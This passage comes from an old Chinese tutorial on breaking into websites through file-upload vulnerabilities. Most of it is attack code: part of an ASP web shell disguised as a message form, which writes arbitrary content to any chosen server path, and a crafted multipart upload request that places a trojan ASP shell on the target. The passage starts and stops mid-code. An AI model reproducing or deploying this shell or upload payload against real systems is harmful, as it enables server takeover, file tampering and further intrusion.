实例分析 上传漏洞入侵实战及扩展
2006-11-07 20:06:12 来源:WEB开发网<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red><h2>成功!</h2><font>" %>
<% else %>
<% response.write "<font color=red><h1>失败!</h1></font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存留言<font color=red>如D:webx.asp</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.write "地址来自" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "<br>" %>
<% Response.write "你的留言:" %>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=sky!!>" %>
<% Response.write "</form>" %>
-----------------------------7d52191850242
Content-Disposition: form-data; name="fname"
E:木马aspshell.asp
-----------------------------7d52191850242
Content-Disposition: form-data; name="Submit"
更多精彩
赞助商链接